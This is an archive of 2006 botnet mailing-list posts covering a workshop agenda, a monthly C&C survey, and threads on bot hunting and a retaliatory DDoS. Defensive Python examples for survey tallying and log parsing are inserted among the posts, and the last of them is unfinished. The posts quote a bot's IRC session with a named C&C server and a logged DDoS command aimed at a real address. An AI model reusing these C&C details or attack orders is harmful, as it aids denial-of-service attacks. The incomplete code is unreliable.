Nope, but I will ask. Most of the numbers I get are at 15K. I can only prove *on my own* without relying on other sources, as reliable as they may be, 12K, which is the number we mentioned in the article. We were being conservative due to that reason, but the number is higher. I don't know what others may be seeing, but this is our best estimate as to what's going on with the number of unique samples released every month. Jose Nazarijo from Arbor replied on the botnets list that he sees similar numbers.

I hope this helps... what are you looking to hear?

Some kind of explanation for the huge disjunction between these numbers and our instinctive ideas about what's possible. Of course, being

I followed you this far, but to be honest, your ideas (what are they?) are indeed very far from reality... :)

un-worked-out intuitive estimates, such ideas are of course entirely likely to be off the mark, but off the mark by two orders of magnitude? Hence the request for more methodological details
Re: [botnets] the world of botnets article number?
On Tue, 12 Sep 2006, Toby McKay wrote:

hello gadi. in your recent the world of botnets article that you mentioned, you wrote that there are an average of 12K bots a month in-the-wild. Where do you get this number? ./mcktoby

I've been getting private queries on what article this is. You can find it here:
http://blogs.securiteam.com/index.php/archives/593
http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf

Any input appreciated.

Thanks, Gadi.
[botnets] mitigate botnets in 5 steps!
Okay, who picks up the glove? I wanna see: Botnets for dummies by next year.

Gadi.
[botnets] uh huh
Bauer cites Maxwell's lack of a criminal record and maintains that he did not intend such an extensive spread of his robot virus program, or botnet software

http://seattlepi.nwsource.com/local/282561_botnet25.html
[botnets] final agenda for August 10th DA Workshop
Probably will have final tweaks. Web site: http://isotf.org/isoi.html

Please note, aside to bringing us all together, one of the main goals is seeing the different perspectives and current operations of the different sides of the fight. Namely: Law enforcement, Anti Viruses, Anti Spam, Dynamic DNS Providers and ISP's.

So far, 67 spots out of 75 available at the Cisco facility in San Jose are taken. The agenda is quite tight.

Thank you all for your support in setting this up at such short notice, and for the community for getting involved beyond the closed circle groups.

Agenda
------
09:00 - 09:05 - Preview of the day - Gadi Evron (Beyond Security)
09:05 - 09:30 - Early sessions - botnets from different perspectives, hosted by Paul Vixie (ISC):
                ISP's - Barry Greene (Cisco)
                Anti Virus industry - Joe Hartmann (Trend Micro)
                DynDNS providers - Joshua Anderson (Afraid)
                Anti spam and reputation services - Dave Crocker (Brandenburg InternetWorking)

Main Lectures:
09:30 - 10:10 - Key-note: Bot, Botnets, Sandbox, Impact - Righard J. Zwienenberg (Norman)
10:10 - 10:45 - MSRC Malware/Exploit Zero Day Response - Case Studies - Greg Galford (Microsoft)
10:45 - 11:20 - The Rough Road Around Us in Botnet Tracking - Jose Nazarijo (Arbor)
11:20 - 11:55 - Malcode Toolkit Profiteering: Feeding the Trend in M.O. from Fame to Fortune - Hubbard Dan (Websense)
11:55 - 12:30 - Lunch break - Got chow?
12:30 - 13:05 - Case Study: *** - Levi Gundert (US Secret Service)
13:05 - 13:40 - Recent Bots Detection Information from Microsoft Security Products - Ziv Mador (Microsoft)
13:40 - 14:25 - Router Stress: An Under the Hood Look at How a Router is Really Attacked and DOSed - Barry Raveendran Greene (Cisco)
14:25 - 15:00 - What Keeps Us Up at Night: New Advanced Difficult to Mitigate DDoS Attacks - Darrel Lewis (Cisco)
15:00 - 15:35 - Phishing and Botnets Organized Crime: Globalization and Technology Intelligence Update - Gadi Evron (Beyond Security)
15:35 - 16:10 - TBA - Jerry Dixon (US-CERT, DHS)

Turbo talks:
16:20 - 16:35 - The Global Infection Rate - Rick Wesson (Alice's Registry)
16:35 - 16:50 - Fast-flux Botnet C&C Servers - Detection & Mitigation - Randy Vaughn (Baylor)
16:50 - 17:10 - TBA - David Ulevitch (EveryDNS / OpenDNS)

17:10 - 18:30 - Community discussion subjects:
                The Past Year in Activity - Gadi Evron
                Law Enforcement Cooperation Operations - TBA
                Creating More Actionable Intelligence - TBA
                The Ratout AS-based Reporting System, Overview and Future Development - Randy Vaughn
                Activity for the Coming Year - Gadi Evron

After-party: Dinner, hosted by the ISC.

Gadi.
[botnets] ISOI - DA Workshop agenda and web page
Hi. You can find the information and latest agenda on the DA workshop on this URL: http://isotf.org/isoi.html

It will be updated in the next few days to include a suggested hotel and the rest of the names missing for the listed lectures.

Quick reminders: 10th of August, hosted by Cisco in San Jose. Please confirm your arrival. Also, please confirm if you will stay for the dinner hosted by the ISC.

Thanks, Gadi.
[botnets] CFP: DA Workshop - ISOI
This is a call for papers for a DA Workshop (ISOTF/TISF DA). Its name is: Internet Security Operations and Intelligence Workshop or ISOI for short. DA stands for Drone Armies (botnets), which is the main subject of this workshop. I apologize for those who get this message multiple times.

Introduction
------------
This workshop is for the purpose of bringing together members of the DA and MWP operational communities and share information, as well as plan our future operations. It is open to other operational communities as specified below. Among the attendees are: Professionals from ISPs, Anti Viruses, Anti Spam, CERTs, Law Enforcement, Academia, etc. coming together to work on the most recent technology, intelligence and operations being done online today for the security of the Internet.

This ISOI DA Workshop is being hosted by Cisco Systems, Inc., whom we would like to thank at this time.

CFP
---
The call for papers is open to the public. The main subject of interest is botnets. Secondary subjects are Denial of Service attacks and phishing. Submission is simple, email me directly with your topic and some data to back it up by July 23rd.

Scope:
------
This year's workshop will be mainly on the subject of botnets. Secondary subjects include Denial of Service attacks and phishing. This workshop will provide the usual benefits such as lectures and networking, but mostly we will discuss the latest occurrences, technology and intelligence and our future plans, as well as coordination and information sharing between other operational and research communities. Cooperation with law enforcement will also be covered.

Details:
--------
Date: Thursday, August 10, 2006
When: 9:30 a.m. - 5:00 p.m.
Location: Cisco Systems, Inc., Building C, 150 Tasman Drive, San Jose, CA 95134

Attending Remotely:
-------------------
A phone conference bridge and web conference will be available to share presentations for remote attendees.

Intended Audience:
------------------
Hands-on people and decision makers.

Attendance:
-----------
The workshop is organized by the DA and MWP communities with the much appreciated help of Cisco Systems, Inc., and is closed to members of the following communities: DA, MWP (and sister communities such as routesec), OARC, NSP-SEC, FIRST and the honey-net project. If you are not a member and would like to attend, feel free to send a request. We would be happy to learn of your interest. The workshop is closed to reporters. Please verify your arrival by August 1st, space is limited.

Costs:
------
Attendance is free.

-- Gadi Evron, ISOI/DA Coordinator, [EMAIL PROTECTED]
[botnets] Drone Armies C&C Report - 30 Jun 2006 (fwd)
-- Forwarded message --
Date: Fri, 30 Jun 2006 21:51:33 -0500
From: [EMAIL PROTECTED]
To: nanog@merit.edu
Subject: Drone Armies C&C Report - 30 Jun 2006

This is a periodic public report from the ISOTF's affiliated group 'DA' (Drone Armies (botnets) research and mitigation mailing list / TISF DA) with the ISOTF affiliated ASreport project (TISF / RatOut).

For this report it should be noted that we base our analysis on the data we have accumulated from various sources, which may be incomplete. Any responsible party that wishes to receive reports of botnet command and control servers on their network(s) regularly and directly, feel free to contact us.

For purposes of this report we use the following terms:
  open    the host completed the TCP handshake
  closed  no activity detected
  reset   issued a RST

This month's survey is of 3420 unique domains (or IPs) with port suspect C&Cs. This list is extracted from the BBL which has a historical base of 10579 reported C&Cs. Of the suspect C&Cs surveyed, 624 reported as Open, 1110 reported as closed, and 580 issued resets to the survey instrument. Of the C&Cs listed by domain name in our C&C database, 4778 are mitigated.

Top 20 ASNes by Total suspect domains mapping to a host in the ASN. These numbers are determined by counting the number of domains which resolve to a host in the ASN. We do not remove duplicates and some of the ASNs reported have many domains mapping to a single IP. Note the Percent_resolved figure is calculated using only the Total and Open counts and does not represent a mitigation effectiveness metric.

  ASN    Responsible Party                       Total  Open  Percent_resolved
  19318  NJIIX-AS-1 - NEW JERSEY INTERN             75    13    83
  23522  CIT-FOONET                                 51    19    63
  13301  UNITEDCOLO-AS Autonomous System of         51    14    73
  4766   KIXS-AS-KR                                 39    14    64
  4134   CHINANET-BACKBONE                          27    14    48
  9318   HANARO-AS                                  26     8    69
  4314   IIS-64 I-55 INTERNET SERVICES              26     2    92
  7132   SBC Internet Services                      25     6    76
  33597  InfoRelay Online Systems, Inc.             24     0   100
  8560   SCHLUND-AS                                 24     6    75
  4837   CHINA169-Backbone                          23    10    57
  3561   Savvis                                     22     2    91
  30315  Everyones Internet                         22    10    55
  13749  EVRY Everyones Internet                    21     1    95
  1659   ERX-TANET-ASN1                             21     6    71
  174    Cogent Communications                      20    13    35
  13237  LAMBDANET-AS                               20    15    25
  13213  UK2NET-AS UK-2 Ltd Autonomous Syste        20     0   100
  21840  SAGONE Sago Networks                       19     3    84
  29073  COLINKS-AS Colinks web and game hos        19    18     5

Top 20 ASNes by number of active suspect C&Cs. These counts are determined by the number of suspect domains or IPs located within the ASN that completed a connection request.

  ASN    Responsible Party                       Total  Open  Percent_resolved
  23522  CIT-FOONET                                 51    19    63
  29073  COLINKS-AS Colinks web and game hos        19    18     5
  13237  LAMBDANET-AS                               20    15    25
  4766   KIXS-AS-KR                                 39    14    64
  13301  UNITEDCOLO-AS Autonomous System of         51    14    73
  4134   CHINANET-BACKBONE                          27    14    48
  19318  NJIIX-AS-1 - NEW JERSEY INTERN             75    13    83
  174    Cogent Communications                      20    13    35
  30315  Everyones Internet                         22    10    55
  4837   CHINA169-Backbone                          23    10    57
  10032  HGC-AS-AP Hutchison Global Crossing        11    10     9
  9911   CONNECTPLUS-AP Singapore Telecom           13    10    23
  35908  Krypt Technologies Inc.                    13     9    31
  36263  forona.                                    10     8    20
  9318   HANARO-AS                                  26     8    69
  9600   SONY CORPORATION                            7     7     0
  16265  LEASEWEB AS                                13     7    46
  18942  WEBHO-3 WebHostPlus Inc                     7     6    14
  1659   ERX-TANET-ASN1                             21     6    71
  12322  PROXAD AS for Proxad ISP                    7     6    14

Randal Vaughn                 Gadi Evron
Professor                     ge at linuxbox.org
Baylor
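How a survey like the one above turns probe results into the Total / Open / Percent_resolved columns, as an added example that is not the DA/RatOut project's own code. It classifies each probe the way the report defines its terms (open: TCP handshake completed; reset: RST received; closed: no activity) and rolls the results up per ASN. The Percent_resolved formula, 100*(Total-Open)/Total rounded, is inferred from the published rows (for example 75 total and 13 open gives 83) and is an assumption; the domain-to-ASN mapping and probe outcomes in SAMPLE are constructed data using documentation ASNs, and the helper names are mine.

```python
"""Tallying a suspect-C&C survey per ASN: added example, not the project's
code. Percent_resolved = round(100*(Total-Open)/Total) is inferred from the
report's rows (an assumption); SAMPLE below is constructed data.
"""
import errno
import socket
from collections import defaultdict


def classify_probe(exc):
    """Map the outcome of a TCP connect attempt (None on success, else the
    OSError raised) to the report's terms: open / reset / closed."""
    if exc is None:
        return "open"                              # handshake completed
    if isinstance(exc, ConnectionRefusedError) or \
            getattr(exc, "errno", None) == errno.ECONNREFUSED:
        return "reset"                             # peer answered with RST
    return "closed"                                # timeout/unreachable: no activity


def probe(host, port, timeout=5.0):
    """Attempt the handshake against one suspect C&C (needs network access)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except OSError as exc:
        return classify_probe(exc)


def percent_resolved(total, open_count):
    """Share of an ASN's suspect C&Cs that did not complete the handshake,
    rounded half-up. Not a mitigation metric, as the report itself notes."""
    return int(100 * (total - open_count) / total + 0.5)


def tally_by_asn(results):
    """results: iterable of (asn, responsible_party, state).
    Returns rows of (asn, name, total, open, percent_resolved); duplicates
    (several domains on one IP) are deliberately not removed, as in the report."""
    agg = defaultdict(lambda: [None, 0, 0])
    for asn, name, state in results:
        row = agg[asn]
        row[0] = name
        row[1] += 1
        if state == "open":
            row[2] += 1
    return [(asn, n, t, o, percent_resolved(t, o)) for asn, (n, t, o) in agg.items()]


def top_by(rows, column, n=20):
    """Rank like the two tables in the report: column 2 = Total, 3 = Open."""
    return sorted(rows, key=lambda r: r[column], reverse=True)[:n]


# Constructed sample: 5 suspect C&Cs in AS64496, 3 in AS64497 (documentation ASNs).
SAMPLE = [
    (64496, "EXAMPLE-ONE", "open"),
    (64496, "EXAMPLE-ONE", "closed"),
    (64496, "EXAMPLE-ONE", "reset"),
    (64496, "EXAMPLE-ONE", "closed"),
    (64496, "EXAMPLE-ONE", "open"),
    (64497, "EXAMPLE-TWO", "open"),
    (64497, "EXAMPLE-TWO", "open"),
    (64497, "EXAMPLE-TWO", "open"),
]

if __name__ == "__main__":
    rows = tally_by_asn(SAMPLE)
    print("ASN    Responsible Party   Total  Open  Percent_resolved")
    for asn, name, t, o, p in top_by(rows, 2):
        print(f"{asn:<6} {name:<18} {t:>5} {o:>5} {p:>17}")
```

Note that an ASN with all of its C&Cs answering scores 0 (as SONY CORPORATION does above) while one with none answering scores 100, so a high Percent_resolved only says that the hosts were not reachable at survey time, not that anyone mitigated them.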
[botnets] eu spam symposium coverage and spammerX
Spamhuntress is doing some coverage, it's interesting: http://spamhuntress.com/
[botnets] microsoft statistics to LOOK at
http://download.microsoft.com/download/3/d/e/3de2470b-ab9a-4a7f-b760-ee2421df294a/WindowsRemovalToolWP.doc

.doc link

Gadi.
[botnets] NTFS Streams rootkit?
First reported in 1998 (http://www.securiteam.com/windowsntfocus/3H5PQS0N5G.html) and reported since every couple of years or so (last time was last week on bugtraq), now (that we know of) there is apparently a rootkit using this technique.

Check out this discussion at Sysinternals: http://www.sysinternals.com/forum/forum_posts.asp?TID=6084PN=1

Gadi.
Re: [botnets] [Bulk] Re: Botnets welcome?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
On Tue, 30 May 2006, Craig Holmes wrote:

On Tuesday 30 May 2006 04:55, Gadi Evron wrote:

Public IRC servers on IRC networks have been used for botnets extensively in the past. Even though they were in denial, the situation in around 2002-2003 was that 20 to 50 per cent of the big networks were drones.

In my experience, a lot of the reason that public IRC servers tolerate drones and drone farmers is not by choice. There are (or were) few IRC servers that could withstand a full-out DDoS attack by a large-scale drone network. Waltzing into a drone channel and k-lining 10,000+ drones can have many effects:

1) This much traffic could cause the IRC server to lag to desync (on legacy IRC servers, anyway)
2) Poorly configured bots would hammer the IRC port day and night (times 10,000)
3) A well-designed drone could use a dynamic DNS service to update and use a different server. The then angry farmer would DDoS the crap out of the public IRC server he was just k-lined from.

I personally support them, but I believe the days of botnet hunting their way are over since about 2000. Still, I've been wrong before, and I've never seen any better way of learning about botnets.

Could you elaborate a little on this point? I feel that the shadowserver people are doing a good job, and I feel their methods are most effective. Fact is, I can think of no better way to do what they're doing.

They are not doing just a good job, they are doing an amazing job. Plus, they are good people and under very good leadership. That's how most of us who have been in this thing since the start indeed started. I am saying though that in my opinion it is more of a starting point for them to learn and move to mitigating from hunting. Projects take time and they are taking good and firm steps, but they are still new in this. I have no issues with their activities or they would have heard from me directly, as they are colleagues and friends.

This is not about them, it's about interacting with the Bad Guys, snooping their servers and how these are eventually mitigated. These have been misconceived as far as I am concerned on this list, so I am elaborating on these points.

In my opinion, most of what ISP's, as an example, are concerned with, which is mitigating the C&C's, is no longer even working. The C&C's are much more robust and distributed, not to mention with backup control channels. Mitigating them has become close to useless other than moving the localized trouble to someone else's back yard. Further, by just killing C&C's, which was a very good idea originally, ISP's have caused the Bad Guys to learn, evolve and invent new technologies.

Killing C&C's was still useful though, to hold back the tide. Today, it is no more than a means of making it a bit more painful for the Bad Guys to operate, and a huge waste of abuse-handling resources is done alone. Shadowserver, much like the ISP's and many of us, concentrates mostly on that point. Further, they are evolving and learning as they go. They had some mistakes like all of us, and they are fast becoming far better at what they do.

That's just my general opinion of the activity of hunting botnets in general, interacting with bad guys, etc. Nicholas can help me better articulate my thoughts on his project, perhaps, but this is not criticism toward him or them. Just how we, all of us, generally do things these days.

This is an economic problem and we are no longer causing this to be more costly or risky for the bad guys by killing their C&C's. That's ancient tech. The fact that brand new groups like Shadowserver emerge, join the fight and learn new things is critical, as unlike most of us, they actually see that what most of us do these days is useless, just like we did back when we got started. Our lessons back then have become set values and traditions, looking at some things as even inherently wrong. They are re-learning our original art and re-inventing the scene.

I hope this is a better explanation. They are new and inexperienced, but I don't see it as a problem as they are serious. Being young is something you grow out of (as I once answered in a job interview).

Craig
___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Malware TCP connect report
On Mon, 22 May 2006, Nicholas Albright wrote:

This list was created by Chas Tomlin of Shadowserver.org. All TCP connections were verified before posting.

Naturally, the shadowserver guys also verify these IRC servers reply as IRC servers; the TCP handshake test is only to see what's still up for the sake of this report, but they also conduct manned checks.

Gadi.
[botnets] RFC: public efforts in the botnets realm
Hi, this is an FYI. A discussion will now commence on the DA list to try and measure if public efforts are indeed a good idea, and how much good vs. bad they cause in the fight against botnets, distributed denial of service attacks, Internet survivability and online crime, as it can indeed be measured.

I would also like the community's opinion on the subject at hand, so that we can relay it and make a more client-oriented decision (take the needs of the community into consideration as well).

Thanks,
Gadi.

-- Forwarded message --
Date: Mon, 22 May 2006 02:02:48 -0500 (CDT)
From: Gadi Evron [EMAIL PROTECTED]
To: closed botnets list
Subject: public efforts

Hi guys.

Our public efforts in the botnet realm thus far consist of *mainly*:
1. The monthly C&C report.
2. Public botnet reporting to us.
3. Public discussion list.

The monthly report is now largely accepted by most in the net-ops community as reliable, and it meets the test of scrutiny. We had some early bumps on how we represent data, what data we want to show and what information we want to deduce from it - but I think we are there now.

Public botnet reporting to us is going great. I stopped relaying them to the list as it is extremely time consuming for me, but they are dealt with. As soon as a volunteer who doesn't just want to talk to the press and take them off my back but also do this work comes along, we will get these again here too.

The public discussion list has in my opinion brought an immense public awareness, law enforcement interest and industry work. Little to no new information was divulged there that the Bad Guys would not already know with their gigs of bot sources and exchange networks (not to mention support web forums).

That's just my opinion, feel free to chime in. The monthly reports are great, as is getting data from the public of net-ops and sys-admins. The discussion list is on a tight leash, but I would like those of you who have been monitoring it and disagree with me to do so here and tell us why we failed there.

If we indeed see the botnets@ list as a success, I would like us to move forward and divulge more redundant already public information to the public, and help move the cause along further than by classifying every bit of useless information as top secret.

Thanks, I am looking forward to your input,
Gadi.

--
In a good cause, there are no failures, only delayed successes. ~Isaac Asimov, In a Good Cause.
Re: [botnets] Weird bot
On Sun, 21 May 2006, Jörg Weber wrote:

Hi Gadi,

Just a guess: an IRC based C&C which is either on a bad connection or very over-loaded with bots.

I don't think it is a very bad connection, as symantec.loves.the.cock.pheer.biz seems to be an alias for at least seven IPs. Plus, the response time itself is not bad on the commands I figured out. I'd think it is an IRC-based C&C without implementing all or some modified subset of IRC commands.

Are you able to connect and then have problems getting information because of disabled/renamed commands, etc., or are you not even connecting (timing out, refused, etc.)?

Cheers,
Joerg

--
Joerg Weber M. A.
Team Lead Network Security/Network Applications
infoServe GmbH
Nell-Breuning-Allee 6
D-66115 Saarbruecken
T: (0681) 8 80 08 - 59
F: (0681) 8 80 08 - 33
www.infos.de
mailto: [EMAIL PROTECTED]

-Original Message-
From: Gadi Evron [mailto:[EMAIL PROTECTED]]
Sent: Sunday, May 21, 2006 12:20 PM
To: Jörg Weber
Cc: botnets@whitestar.linuxbox.org
Subject: Re: [botnets] Weird bot

On Sat, 20 May 2006, Jörg Weber wrote:

Hi folks,

I found this funny thing during the weekend: It connects to symantec.loves.the.cock.pheer.biz 18067 and seems to initiate something akin to an IRC session:

    USeR l l l l
    NiCK l5-00050c7b
    :a4 433 * l5-00050c7b :
    NiCK l5-00051247
    :a4 001 l5-00051247 :
    USeRHOST l5-00051247
    :a4 302 l5-00051247 :[EMAIL PROTECTED]
    JOiN #l5t3 dlrowymx0ri
    :a4 366 l5-00051247 #l5t3 :

Trying to connect to that box by telnet/netcat/irc fails at times and works sometimes, but I couldn't get the server to spill out any useful information. Does someone have a clue what this beast is?

Just a guess: an IRC based C&C which is either on a bad connection or very over-loaded with bots.

Gadi.

Cheers,
J.
Re: [botnets] Weird bot
On Sat, 20 May 2006, Jörg Weber wrote:

Hi folks,

I found this funny thing during the weekend: It connects to symantec.loves.the.cock.pheer.biz 18067 and seems to initiate something akin to an IRC session:

    USeR l l l l
    NiCK l5-00050c7b
    :a4 433 * l5-00050c7b :
    NiCK l5-00051247
    :a4 001 l5-00051247 :
    USeRHOST l5-00051247
    :a4 302 l5-00051247 :[EMAIL PROTECTED]
    JOiN #l5t3 dlrowymx0ri
    :a4 366 l5-00051247 #l5t3 :

Trying to connect to that box by telnet/netcat/irc fails at times and works sometimes, but I couldn't get the server to spill out any useful information. Does someone have a clue what this beast is?

Just a guess: an IRC based C&C which is either on a bad connection or very over-loaded with bots.

Gadi.

Cheers,
J.
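As an added example (not part of the post, and not code from any tool mentioned in it), here is a small parser for the captured exchange above that pulls out the traits a defender would note when triaging such a session: mixed-case verbs, generated nicks, the 433 collision followed by a retry, a keyed JOIN, and a bare "a4" server prefix sending empty numeric replies. Which side sent each line is inferred from IRC numerics, and the redacted USERHOST reply is replaced by a placeholder; both are assumptions noted in the code.

```python
"""Parse a captured IRC-style C&C exchange and flag stripped-down-server traits.

Added example, not code from the post. The session lines are the ones quoted
in the post, split one per line; which side sent each line is inferred from
RFC 1459 semantics (a line starting with ':<prefix>' and a three-digit
numeric is a server reply), which is an assumption.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed from the post's capture. The USERHOST reply was redacted in the
# archive ("[EMAIL PROTECTED]"), so a placeholder user@host is used here.
CAPTURE = [
    "USeR l l l l",
    "NiCK l5-00050c7b",
    ":a4 433 * l5-00050c7b :",
    "NiCK l5-00051247",
    ":a4 001 l5-00051247 :",
    "USeRHOST l5-00051247",
    ":a4 302 l5-00051247 :l5-00051247=+l@redacted.example",
    "JOiN #l5t3 dlrowymx0ri",
    ":a4 366 l5-00051247 #l5t3 :",
]

# Replies a normal ircd sends during registration/JOIN that are absent here.
EXPECTED_NUMERICS = {"002", "003", "004", "375", "376", "353"}
GENERATED_NICK = re.compile(r"^[a-z]\d-[0-9a-f]{8}$")   # e.g. l5-00050c7b


@dataclass
class Message:
    prefix: Optional[str]    # ':a4' -> 'a4'; None for client-originated lines
    command: str             # verb or numeric, case preserved
    params: list             # middle parameters
    trailing: Optional[str]  # text after ' :', '' if present but empty

    @property
    def from_server(self) -> bool:
        return self.prefix is not None


def parse_line(line: str) -> Message:
    """Split one IRC line into prefix, command, middle params and trailing."""
    prefix = None
    rest = line.strip()
    if rest.startswith(":"):
        prefix, _, rest = rest[1:].partition(" ")
    head, sep, trailing = rest.partition(" :")
    parts = head.split()
    if not parts:
        raise ValueError(f"no command in line: {line!r}")
    return Message(prefix, parts[0], parts[1:], trailing if sep else None)


def analyze(lines) -> dict:
    """Return indicator flags and a verdict for a captured exchange."""
    msgs = [parse_line(ln) for ln in lines]
    client = [m for m in msgs if not m.from_server]
    server = [m for m in msgs if m.from_server]
    numerics = [m.command for m in server]
    nicks = [m.params[0] for m in client if m.command.upper() == "NICK" and m.params]
    f = {}
    # Real clients send verbs in upper case; ircds are case-insensitive, so
    # 'NiCK'/'JOiN' only defeat naive string matching on the wire.
    f["mixed_case_commands"] = sorted({m.command for m in client
                                       if m.command != m.command.upper()
                                       and m.command != m.command.lower()})
    # Nicks of the shape letter-digit-dash-8hex look generated, not chosen.
    f["generated_nicks"] = [n for n in nicks if GENERATED_NICK.match(n)]
    # 433 (nick in use) then a second NICK: drones colliding on a shared generator.
    f["nick_collision_retry"] = "433" in numerics and len(nicks) > 1
    # JOIN with a second parameter is a channel key (+k): locked drone channel.
    f["join_with_key"] = any(m.command.upper() == "JOIN" and len(m.params) >= 2
                             for m in client)
    # A real server prefixes replies with its hostname, not a bare token like 'a4'.
    f["bare_server_prefix"] = any("." not in m.prefix for m in server)
    # Welcome/NAMES replies with empty text, and no 002-004/MOTD/NAMES at all.
    f["empty_numeric_text"] = [m.command for m in server if m.trailing == ""]
    f["missing_standard_replies"] = sorted(EXPECTED_NUMERICS - set(numerics))
    score = sum([bool(f["mixed_case_commands"]), bool(f["generated_nicks"]),
                 f["nick_collision_retry"], f["join_with_key"],
                 f["bare_server_prefix"], bool(f["empty_numeric_text"])])
    f["score"] = score
    f["verdict"] = "likely stripped-down IRC C&C" if score >= 3 else "inconclusive"
    return f


if __name__ == "__main__":
    for key, value in analyze(CAPTURE).items():
        print(f"{key}: {value}")
```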
[botnets] blue security folds
I just got this in email:
http://wired.com/news/technology/0,70913-0.html?tw=wn_index_1

Now they suddenly care about DDoS by a botnet and about the health of the Internet. I wonder what about their huge DDoS botnet now that they are gone? Not that they ever affected even one spammer. Okay, maybe one. :)

Gadi.

--
The Green Ribbon Campaign Against Purple Ribbons! -- The Geometry of Shadows, Babylon 5.
[botnets] remember Jason?
Our friends at F-Secure just posted this:
http://www.f-secure.com/weblog/#0861

F-Secure is not really involved with the zuper-zecret botnet/phishing/etc. fighting club, but they are cool amazing guys who have always been there to help the fight.

Gadi.

--
The Green Ribbon Campaign Against Purple Ribbons! -- The Geometry of Shadows, Babylon 5.
[botnets] sandbox ddos'd
http://www.norman.com/special/34046
Re: [botnets] Web-Based Bots
David Cheney wrote:

I too am interested in botnets whose command and control mechanism is not IRC. The web and the community seem to be ripe with anecdotal evidence of elusive networks based on a variety of covert communication channels, but as of yet I have not seen any real evidence. There is an analysis of Phatbot which claims it uses a stripped down version of WASTE: http://www.lurhq.com/phatbot.html But I haven't been able to confirm this one yet (looking for a sample). If anyone finds such a beast, I would greatly appreciate any evidence.

I am connecting you with the guy who wrote that. Web C&C's of the BASIC form have been with us for almost a decade in the uses we see for them today.
Re: [botnets] Sink Hole Network
Georg Wicherski wrote:

If you already know the DNS, just force responses to 0.0.0.0 at your DNS gateway. Additionally add a Snort rule for these queries that firewalls the infected clients totally out. Then tell the owners to manually disinfect as `.remove' commands are highly unreliable and the syntax varies anyway.

Regards,
Georg 'oxff' Wicherski

To quote an older email:

Dan wrote:

Yanno, most bot code I've seen has a 'kill' or uninstall feature built in. It might be an idea to build a counter botnet, that will act in our favor when a botnet is found. We could have a bot infiltrate the existing net, and attempt to issue a number of kill/uninstall commands, so the net will eat itself. *shrug*

Hi Dan. :)

That depends significantly on several issues:
1. Is that command remote? (I.e. requiring a remote connection and a remove?) If so, I'd hesitate to do so. Even if it was not illegal, it is indeed unethical to connect to the remote machine uninvited. Further, your actions can result in damage to the remote machine.
2. Is this done with a remote kill command? Same as above, but the bot will re-surface on next re-boot.
3. Is this done by uploading a cleaner? If that is the case, you may potentially also cause the machine to die. :)
4. Is this done via IRC commands at the C&C? I have little problem with that, except that it may put you at risk.

All that said, here are a few items to think of:
1. If the remote machine is indeed compromised and insecure, it will just get re-infected shortly.
2. If that is the case, it is also already probably infected by QUITE A FEW other beasties and is already a part of other botnets (many other!)

Before I go on with wisdom of old, though, I'd like to hear some thoughts from fresh people here. :)

I am very much in favor of actively mitigating risks, but there are costs to any benefits and sometimes the benefits are not worth it, are extremely short lived or just an illusion.

Gadi.
Re: [botnets] DDoS attack
Nicholas Albright wrote:

Shadowserver.org got hit with a DDoS attack yesterday.

Well, it seems like you were slow-to-down for a short while, but no real effect.

We believe that the attack was in retaliation of our monitoring.

No kidding. :) Well, you guys have been vocal. Hmm. I suppose we should do something about this guy. How silly is he, DDoSing people who without life monitor and report C&C's daily?

The launch came from ip 64.18.139.107 port 5100 channel ##kenny:

From C&C:
    Wed Apr 5 23:01:48 2006 pubmsg [EMAIL PROTECTED] ##kenny ['.rape.ssf 64.34.165.168 80 95000']

Does anyone else have any more details on this network?

More off-line, but let's just say some of us yesterday put him on our special radar. He will have a hard time to operate or keep his C&C's live from now on if he makes too much noise.

Gadi.
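An added example, not Shadowserver's code: a parser for C&C monitor lines of the shape quoted above that turns attack orders into incident records a victim's abuse contact could act on, grouped per target so each network is reported once. The sender in the archive was redacted, the reading of the command's fields as "<cmd> <target-ip> <port> <duration>" is an assumption, and the sample lines are constructed (the first mirrors the post's line).

```python
"""Turn C&C monitor log lines into incident records for the attacked party.

Added example, not Shadowserver's code. The line layout (timestamp, 'pubmsg',
sender, channel, bracketed command) follows the single line quoted in the
post; reading the command as '<cmd> <target-ip> <port> <duration>' is an
assumption, and the sender in the archive was redacted, so a placeholder is used.
"""
import ipaddress
import re
from datetime import datetime
from typing import Optional

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d \d{4}) "
    r"pubmsg (?P<sender>\S+) (?P<channel>\S+) \['(?P<text>.*)'\]$"
)

# Constructed sample log: line 1 mirrors the post (sender replaced by a
# placeholder), line 2 is ordinary chatter, line 3 uses a TEST-NET address.
SAMPLE_LOG = [
    "Wed Apr 5 23:01:48 2006 pubmsg op!op@redacted.example ##kenny "
    "['.rape.ssf 64.34.165.168 80 95000']",
    "Wed Apr 5 23:02:10 2006 pubmsg op!op@redacted.example ##kenny "
    "['lol they are down']",
    "Wed Apr 5 23:05:00 2006 pubmsg op!op@redacted.example ##kenny "
    "['.rape.ssf 192.0.2.10 443 600']",
]

# C&C server the post names; kept on each record so the victim can correlate.
CC_SERVER = "64.18.139.107:5100"


def parse_command(text: str) -> Optional[dict]:
    """Decode '.<cmd> <ip> <port> <secs>'; None for chatter or malformed lines."""
    parts = text.split()
    if len(parts) < 4 or not parts[0].startswith("."):
        return None
    try:
        target = ipaddress.ip_address(parts[1])
        port, duration = int(parts[2]), int(parts[3])
    except ValueError:
        return None
    if not 0 < port < 65536 or duration <= 0:
        return None
    return {"command": parts[0], "target": str(target),
            "port": port, "duration_s": duration}


def extract_incidents(lines, cc_server: str = CC_SERVER) -> list:
    """One record per attack order seen in the monitor log."""
    incidents = []
    for line in lines:
        m = LINE_RE.match(line)
        if m is None:
            continue                      # not a channel-message line
        cmd = parse_command(m["text"])
        if cmd is None:
            continue                      # chatter, not an attack order
        when = datetime.strptime(" ".join(m["ts"].split()),
                                 "%a %b %d %H:%M:%S %Y")
        incidents.append({"when": when.isoformat(), "cc_server": cc_server,
                          "cc_channel": m["channel"], "issued_by": m["sender"],
                          **cmd})
    return incidents


def targets_to_notify(incidents) -> dict:
    """Group records by target so each victim network gets a single report."""
    by_target = {}
    for rec in incidents:
        by_target.setdefault(rec["target"], []).append(
            (rec["when"], rec["port"], rec["duration_s"]))
    return by_target


if __name__ == "__main__":
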